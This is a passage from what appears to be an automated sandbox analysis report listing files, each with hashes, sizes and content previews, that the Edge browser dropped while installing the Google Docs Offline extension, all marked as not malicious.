                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ...... ........ ......".. },.. "explanationofflinedisabled": {.. "message": ".... ........... ........ ......... ........ ....... Google Docs... .............., .... ............ ....... ..... ...... .... Google Docs .... ...... ............. ......, ........ ........ ... .......".. },.. "explanationofflineenabled": {.. "message": ".... ........... ......., .... .... ........ .......... .... ....... ..... ....... .... ..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\th\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1674
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.343724179386811
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:fcGjnU3UnGKD1GeU3pktOggV1tL2ggG7Q:f3jnDG1eUk0g6RLE
                                                                                                                                                                                                                                                                                                MD5:64077E3D186E585A8BEA86FF415AA19D
                                                                                                                                                                                                                                                                                                SHA1:73A861AC810DABB4CE63AD052E6E1834F8CA0E65
                                                                                                                                                                                                                                                                                                SHA-256:D147631B2334A25B8AA4519E4A30FB3A1A85B6A0396BC688C68DC124EC387D58
                                                                                                                                                                                                                                                                                                SHA-512:56DD389EB9DD335A6214E206B3BF5D63562584394D1DE1928B67D369E548477004146E6CB2AD19D291CB06564676E2B2AC078162356F6BC9278B04D29825EF0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": ".............. ............. Google .................................... ............................... Google ...... .................................................................".. },.. "explanationofflineenabled": {.. "message": "................................................................".. },.. "extdesc": {.. "message": "..... ..... ........

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\tr\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1063
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.853399816115876
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAowYuBPgoMC4AGehrgGm7tJ3ckwFrXnRs5m:GYsPgrCtGehkGc3cvXr
                                                                                                                                                                                                                                                                                                MD5:76B59AAACC7B469792694CF3855D3F4C
                                                                                                                                                                                                                                                                                                SHA1:7C04A2C1C808FA57057A4CCEEE66855251A3C231
                                                                                                                                                                                                                                                                                                SHA-256:B9066A162BEE00FD50DC48C71B32B69DFFA362A01F84B45698B017A624F46824
                                                                                                                                                                                                                                                                                                SHA-512:2E507CA6874DE8028DC769F3D9DFD9E5494C268432BA41B51568D56F7426F8A5F2E5B111DDD04259EB8D9A036BB4E3333863A8FC65AAB793BCEF39EDFE41403B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN. OLU.TUR".. },.. "explanationofflinedisabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Google Dok.manlar'. .nternet ba.lant.s. olmadan kullanmak i.in, .nternet'e ba.lanabildi.inizde Google Dok.manlar ana sayfas.nda Ayarlar'a gidin ve .evrimd... senkronizasyonu etkinle.tirin.".. },.. "explanationofflineenabled": {.. "message": ".nternet'e ba.l. de.ilsiniz. Ancak, yine de mevcut dosyalar. d.zenleyebilir veya yeni dosyalar olu.turabilirsiniz.".. },.. "extdesc": {.. "message": "Dok.man, e-tablo ve sunu olu.turun, bunlar. d.zenleyin ve g.r.nt.leyin. T.m bu i.lemleri internet eri.imi olmadan yapabilirsiniz.".. },.. "extname": {.. "message": "Google Dok.manlar .evrimd...".. },.. "learnmore": {.. "message": "Daha Fazla Bilgi".. },.. "popuphelptext": {.. "message": ".nternet ba.lant.n.z olsun veya olmas.n, nerede olursan.z olun yaz.n, d.zenl

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\uk\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1333
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.686760246306605
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAk9oxkm6H4KyGGB9GeGoxPEYMQhpARezTtHUN97zlwpEH7:VKU1GB9GeBc/OARETt+9/WCb
                                                                                                                                                                                                                                                                                                MD5:970963C25C2CEF16BB6F60952E103105
                                                                                                                                                                                                                                                                                                SHA1:BBDDACFEEE60E22FB1C130E1EE8EFDA75EA600AA
                                                                                                                                                                                                                                                                                                SHA-256:9FA26FF09F6ACDE2457ED366C0C4124B6CAC1435D0C4FD8A870A0C090417DA19
                                                                                                                                                                                                                                                                                                SHA-512:1BED9FE4D4ADEED3D0BC8258D9F2FD72C6A177C713C3B03FC6F5452B6D6C2CB2236C54EA972ECE7DBFD756733805EB2352CAE44BAB93AA8EA73BB80460349504
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "........".. },.. "explanationofflinedisabled": {.. "message": ".. . ...... ....... ... ............. Google ........... ... ......... . .........., ......... . ............ .. ........ ........ Google .......... . ......... ......-............., .... ...... . .......".. },.. "explanationofflineenabled": {.. "message": ".. . ...... ......, ..... ... .... ...... .......... ........ ..... ... .......... .....".. },.. "extdesc": {.. "message": "........., ......... . ............ ........., .......... ....... .. ........... ... ....... .. ..........".. },.. "extname": {.. "message": "Goo

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\ur\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1263
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.861856182762435
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAl3zNEUhN3mNjkSIkmdNpInuUVsqNtOJDhY8Dvp/IkLzx:e3uUhQKvkmd+s11Lp1F
                                                                                                                                                                                                                                                                                                MD5:8B4DF6A9281333341C939C244DDB7648
                                                                                                                                                                                                                                                                                                SHA1:382C80CAD29BCF8AAF52D9A24CA5A6ECF1941C6B
                                                                                                                                                                                                                                                                                                SHA-256:5DA836224D0F3A96F1C5EB5063061AAD837CA9FC6FED15D19C66DA25CF56F8AC
                                                                                                                                                                                                                                                                                                SHA-512:FA1C015D4EA349F73468C78FDB798D462EEF0F73C1A762298798E19F825E968383B0A133E0A2CE3B3DF95F24C71992235BFC872C69DC98166B44D3183BF8A9E5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ......".. },.. "explanationofflinedisabled": {.. "message": ".. .. .... .... Google Docs .. .... ....... ..... ....... .... ..... .... ... .. .. ....... .. ..... ... .. Google Docs ... ... .. ....... .. ..... ... .. .... ...... ..... .. .. .....".. },.. "explanationofflineenabled": {.. "message": ".. .. .... ... .... .. ... ... ...... ..... ... ..... .. .... ... .. ... ..... ... .... ....".. },.. "extdesc": {.. "message": ".......... .......... ... ....... . .... ... ....... .. ..... .. .... ...... ..... .... ... ..... .......".. },.. "extname": {.. "message": "Google Docs .. ....".. },.. "learnmore": {..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\vi\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1074
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.062722522759407
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAhBBLEBOVUSUfE+eDFmj4BLErQ7e2CIer32KIxqJ/HtNiE5nIGeU+KCVT:qHCDheDFmjDQgX32/S/hI9jh
                                                                                                                                                                                                                                                                                                MD5:773A3B9E708D052D6CBAA6D55C8A5438
                                                                                                                                                                                                                                                                                                SHA1:5617235844595D5C73961A2C0A4AC66D8EA5F90F
                                                                                                                                                                                                                                                                                                SHA-256:597C5F32BC999746BC5C2ED1E5115C523B7EB1D33F81B042203E1C1DF4BBCAFE
                                                                                                                                                                                                                                                                                                SHA-512:E5F906729E38B23F64D7F146FA48F3ABF6BAED9AAFC0E5F6FA59F369DC47829DBB4BFA94448580BD61A34E844241F590B8D7AEC7091861105D8EBB2590A3BEE9
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "T.O M.I".. },.. "explanationofflinedisabled": {.. "message": "B.n .ang ngo.i tuy.n. .. s. d.ng Google T.i li.u m. kh.ng c.n k.t n.i Internet, .i ..n c.i ..t tr.n trang ch. c.a Google T.i li.u v. b.t ..ng b. h.a ngo.i tuy.n v.o l.n ti.p theo b.n ...c k.t n.i v.i m.ng Internet.".. },.. "explanationofflineenabled": {.. "message": "B.n .ang ngo.i tuy.n, tuy nhi.n b.n v.n c. th. ch.nh s.a c.c t.p c. s.n ho.c t.o c.c t.p m.i.".. },.. "extdesc": {.. "message": "Ch.nh s.a, t.o v. xem t.i li.u, b.ng t.nh v. b.n tr.nh b.y . t.t c. m. kh.ng c.n truy c.p Internet.".. },.. "extname": {.. "message": "Google T.i li.u ngo.i tuy.n".. },.. "learnmore": {.. "message": "Ti.m hi..u th.m".. },.. "popuphelptext": {.. "message": "Vi.t, ch.nh s.a v. c.ng t.c

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\zh_CN\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):879
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.7905809868505544
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgteHCBxNtSBXuetOrgIkA2OrWjMOCBxetSBXK01fg/SOiCSUEQ27e1CBhUj:1HAFsHtrIkA2jqldI/727eggcLk9pf
                                                                                                                                                                                                                                                                                                MD5:3E76788E17E62FB49FB5ED5F4E7A3DCE
                                                                                                                                                                                                                                                                                                SHA1:6904FFA0D13D45496F126E58C886C35366EFCC11
                                                                                                                                                                                                                                                                                                SHA-256:E72D0BB08CC3005556E95A498BD737E7783BB0E56DCC202E7D27A536616F5EE0
                                                                                                                                                                                                                                                                                                SHA-512:F431E570AB5973C54275C9EEF05E49E6FE2D6C17000F98D672DD31F9A1FAD98E0D50B5B0B9CF85D5BBD3B655B93FD69768C194C8C1688CB962AA75FF1AF9BDB6
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..".. },.. "explanationofflinedisabled": {.. "message": "....................... Google ................ Google ....................".. },.. "explanationofflineenabled": {.. "message": ".............................".. },.. "extdesc": {.. "message": "...................... - ........".. },.. "extname": {.. "message": "Google .......".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "...............................".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\zh_HK\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1205
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.50367724745418
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YWvqB0f7Cr591AhI9Ah8U1F4rw4wtB9G976d6BY9scKUrPoAhNehIrI/uIXS1:YWvl7Cr5JHrw7k7u6BY9trW+rHR
                                                                                                                                                                                                                                                                                                MD5:524E1B2A370D0E71342D05DDE3D3E774
                                                                                                                                                                                                                                                                                                SHA1:60D1F59714F9E8F90EF34138D33FBFF6DD39E85A
                                                                                                                                                                                                                                                                                                SHA-256:30F44CFAD052D73D86D12FA20CFC111563A3B2E4523B43F7D66D934BA8DACE91
                                                                                                                                                                                                                                                                                                SHA-512:D2225CF2FA94B01A7B0F70A933E1FDCF69CDF92F76C424CE4F9FCC86510C481C9A87A7B71F907C836CBB1CA41A8BEBBD08F68DBC90710984CA738D293F905272
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u5efa\u7acb\u65b0\u9805\u76ee"},"explanationofflinedisabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\u3002\u5982\u8981\u5728\u6c92\u6709\u4e92\u806f\u7db2\u9023\u7dda\u7684\u60c5\u6cc1\u4e0b\u4f7f\u7528\u300cGoogle \u6587\u4ef6\u300d\uff0c\u8acb\u524d\u5f80\u300cGoogle \u6587\u4ef6\u300d\u9996\u9801\u7684\u8a2d\u5b9a\uff0c\u4e26\u5728\u4e0b\u6b21\u9023\u63a5\u4e92\u806f\u7db2\u6642\u958b\u555f\u96e2\u7dda\u540c\u6b65\u529f\u80fd\u3002"},"explanationofflineenabled":{"message":"\u60a8\u8655\u65bc\u96e2\u7dda\u72c0\u614b\uff0c\u4f46\u60a8\u4ecd\u53ef\u4ee5\u7de8\u8f2f\u53ef\u7528\u6a94\u6848\u6216\u5efa\u7acb\u65b0\u6a94\u6848\u3002"},"extdesc":{"message":"\u7de8\u8f2f\u3001\u5efa\u7acb\u53ca\u67e5\u770b\u60a8\u7684\u6587\u4ef6\u3001\u8a66\u7b97\u8868\u548c\u7c21\u5831\uff0c\u5b8c\u5168\u4e0d\u9700\u4f7f\u7528\u4e92\u806f\u7db2\u3002"},"extname":{"message":"\u300cGoogle \u6587\u4ef6\u300d\u96e2\u7dda\u7248"},"learnmore":{"message":"\u77ad\u89e3\u8a

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\zh_TW\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):843
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.76581227215314
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgmaCBxNtBtA24ZOuAeOEHGOCBxetBtMHQIJECSUnLRNocPNy6CBhU5OGg1O:1HAEfQkekYyLvRmcPGgzcL2kx5U
                                                                                                                                                                                                                                                                                                MD5:0E60627ACFD18F44D4DF469D8DCE6D30
                                                                                                                                                                                                                                                                                                SHA1:2BFCB0C3CA6B50D69AD5745FA692BAF0708DB4B5
                                                                                                                                                                                                                                                                                                SHA-256:F94C6DDEDF067642A1AF18D629778EC65E02B6097A8532B7E794502747AEB008
                                                                                                                                                                                                                                                                                                SHA-512:6FF517EED4381A61075AC7C8E80C73FAFAE7C0583BA4FA7F4951DD7DBE183C253702DEE44B3276EFC566F295DAC1592271BE5E0AC0C7D2C9F6062054418C7C27
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".....".. },.. "explanationofflinedisabled": {.. "message": ".................. Google ................ Google .................".. },.. "explanationofflineenabled": {.. "message": ".........................".. },.. "extdesc": {.. "message": ".............................".. },.. "extname": {.. "message": "Google .....".. },.. "learnmore": {.. "message": "....".. },.. "popuphelptext": {.. "message": "................................".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_locales\zu\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):912
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.65963951143349
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:YlMBKqLnI7EgBLWFQbTQIF+j4h3OadMJzLWnCieqgwLeOvKrCRPE:YlMBKqjI7EQOQb0Pj4heOWqeyaBrMPE
                                                                                                                                                                                                                                                                                                MD5:71F916A64F98B6D1B5D1F62D297FDEC1
                                                                                                                                                                                                                                                                                                SHA1:9386E8F723C3F42DA5B3F7E0B9970D2664EA0BAA
                                                                                                                                                                                                                                                                                                SHA-256:EC78DDD4CCF32B5D76EC701A20167C3FBD146D79A505E4FB0421FC1E5CF4AA63
                                                                                                                                                                                                                                                                                                SHA-512:30FA4E02120AF1BE6E7CC7DBB15FAE5D50825BD6B3CF28EF21D2F2E217B14AF5B76CFCC165685C3EDC1D09536BFCB10CA07E1E2CC0DA891CEC05E19394AD7144
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"DALA ENTSHA"},"explanationofflinedisabled":{"message":"Awuxhunyiwe ku-inthanethi. Ukuze usebenzise i-Google Amadokhumenti ngaphandle koxhumano lwe-inthanethi, iya kokuthi izilungiselelo ekhasini lasekhaya le-Google Amadokhumenti bese uvula ukuvumelanisa okungaxhunyiwe ku-inthanethi ngesikhathi esilandelayo lapho uxhunywe ku-inthanethi."},"explanationofflineenabled":{"message":"Awuxhunyiwe ku-inthanethi, kodwa usangakwazi ukuhlela amafayela atholakalayo noma udale amasha."},"extdesc":{"message":"Hlela, dala, futhi ubuke amadokhumenti akho, amaspredishithi, namaphrezentheshini \u2014 konke ngaphandle kokufinyelela kwe-inthanethi."},"extname":{"message":"I-Google Amadokhumenti engaxhumekile ku-intanethi"},"learnmore":{"message":"Funda kabanzi"},"popuphelptext":{"message":"Bhala, hlela, futhi hlanganyela noma yikuphi lapho okhona, unalo noma ungenalo uxhumano lwe-inthanethi."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\_metadata\verified_contents.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):11406
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.745845607168024
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:192:RBG1G1UPkUj/86Op//Ier/2nsNLJtwg+K8HNnswuH+svyw6r+cgTSJJT4LGkt:m8IEI4u8/EgG4
                                                                                                                                                                                                                                                                                                MD5:0A68C9539A188B8BB4F9573F2F2321D6
                                                                                                                                                                                                                                                                                                SHA1:E0F814FA4DCC04EDC6A5D39CBC1038979E88F0E5
                                                                                                                                                                                                                                                                                                SHA-256:39E6C25D096AFD156644F07586D85E37F1F7B3DA9B636471E8D15CEB14DB184F
                                                                                                                                                                                                                                                                                                SHA-512:13F133C173C6622B8E1B6F86A551CBC5B0B2446B3CF96E4AE8CA2646009B99E4A360C2DB3168CB94A488FAEBD215003DFA60D10150B7A85B5F8919900BD01CCC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:[{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiIxMjgucG5nIiwicm9vdF9oYXNoIjoiZ2NWZy0xWWgySktRNVFtUmtjZGNmamU1dzVIc1JNN1ZCTmJyaHJ4eGZ5ZyJ9LHsicGF0aCI6Il9sb2NhbGVzL2FmL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJxaElnV3hDSFVNLWZvSmVFWWFiWWlCNU9nTm9ncUViWUpOcEFhZG5KR0VjIn0seyJwYXRoIjoiX2xvY2FsZXMvYW0vbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IlpPQWJ3cEs2THFGcGxYYjh4RVUyY0VkU0R1aVY0cERNN2lEQ1RKTTIyTzgifSx7InBhdGgiOiJfbG9jYWxlcy9hci9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiUjJVaEZjdTVFcEJfUUZtU19QeGstWWRrSVZqd3l6WEoxdURVZEMyRE9BSSJ9LHsicGF0aCI6Il9sb2NhbGVzL2F6L21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJZVVJ3Mmp4UU5Lem1TZkY0YS1xcTBzbFBSSFc4eUlXRGtMY2g4Ry0zdjJRIn0seyJwYXRoIjoiX2xvY2FsZXMvYmUvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6IjNmRm9XYUZmUHJNelRXSkJsMXlqbUlyRDZ2dzlsa1VxdzZTdjAyUk1oVkEifSx7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiSXJ3M3RIem9xREx6bHdGa0hjTllOWFoyNmI0WWVwT2t4ZFN

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\dasherSettingSchema.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):854
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.284628987131403
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:ont+QByTwnnGNcMbyWM+Q9TZldnnnGGxlF/S0WOtUL0M0r:vOrGe4dDCVGOjWJ0nr
                                                                                                                                                                                                                                                                                                MD5:4EC1DF2DA46182103D2FFC3B92D20CA5
                                                                                                                                                                                                                                                                                                SHA1:FB9D1BA3710CF31A87165317C6EDC110E98994CE
                                                                                                                                                                                                                                                                                                SHA-256:6C69CE0FE6FAB14F1990A320D704FEE362C175C00EB6C9224AA6F41108918CA6
                                                                                                                                                                                                                                                                                                SHA-512:939D81E6A82B10FF73A35C931052D8D53D42D915E526665079EEB4820DF4D70F1C6AEBAB70B59519A0014A48514833FEFD687D5A3ED1B06482223A168292105D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{. "type": "object",. "properties": {. "allowedDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Allow users to enable Docs offline for the specified managed domains.",. "description": "Users on managed devices will be able to enable docs offline if they are part of the specified managed domains.". },. "autoEnabledDocsOfflineDomains": {. "type": "array",. "items": {. "type": "string". },. "title": "Auto enable Docs offline for the specified managed domains in certain eligible situations.",. "description": "Users on managed devices, in certain eligible situations, will be able to automatically access and edit recent files offline for the managed domains set in this property. They can still disable it from Drive settings.". }. }.}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\manifest.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2525
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.417954053901
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HEZ4WPoolELb/KxktGw3VwELb/4iL2QDkUpvdz1xxy/Atj17x9yiVvQe:WdP5aLTKQGwlTLT4oRvvxs/AP7xgiVb
                                                                                                                                                                                                                                                                                                MD5:5E425DC36364927B1348F6C48B68C948
                                                                                                                                                                                                                                                                                                SHA1:9E411B88453DEF3F7CFCB3EAA543C69AD832B82F
                                                                                                                                                                                                                                                                                                SHA-256:32D9C8DE71A40D71FC61AD52AA07E809D07DF57A2F4F7855E8FC300F87FFC642
                                                                                                                                                                                                                                                                                                SHA-512:C19217B9AF82C1EE1015D4DFC4234A5CE0A4E482430455ABAAFAE3F9C8AE0F7E5D2ED7727502760F1B0656F0A079CB23B132188AE425E001802738A91D8C5D79
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/*", "https://drive.google.com/*", "https://drive-autopush.corp.google.com/*", "https://drive-daily-0.corp.google.com/*", "https://drive-daily-1.corp.google.com/*", "https://drive-daily-2.corp.google.com/*", "https://drive-daily-3.corp.google.com/*", "https://drive-daily-4.corp.google.com/*", "https://drive-daily-5.corp.google.com/*", "https://drive-daily-6.corp.google.com/*", "https://drive-preprod.corp.google.com/*", "https://drive-staging.corp.google.com/*" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\offscreendocument.html

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):97
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.862433271815736
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
                                                                                                                                                                                                                                                                                                MD5:B747B5922A0BC74BBF0A9BC59DF7685F
                                                                                                                                                                                                                                                                                                SHA1:7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
                                                                                                                                                                                                                                                                                                SHA-256:B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
                                                                                                                                                                                                                                                                                                SHA-512:7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir8052_1443196051\CRX_INSTALL\offscreendocument_main.js

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (4882)
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):122218
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.439997574414675
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
                                                                                                                                                                                                                                                                                                MD5:67C4451398037DD1C497A1EA98227630
                                                                                                                                                                                                                                                                                                SHA1:F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
                                                                                                                                                                                                                                                                                                SHA-256:59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
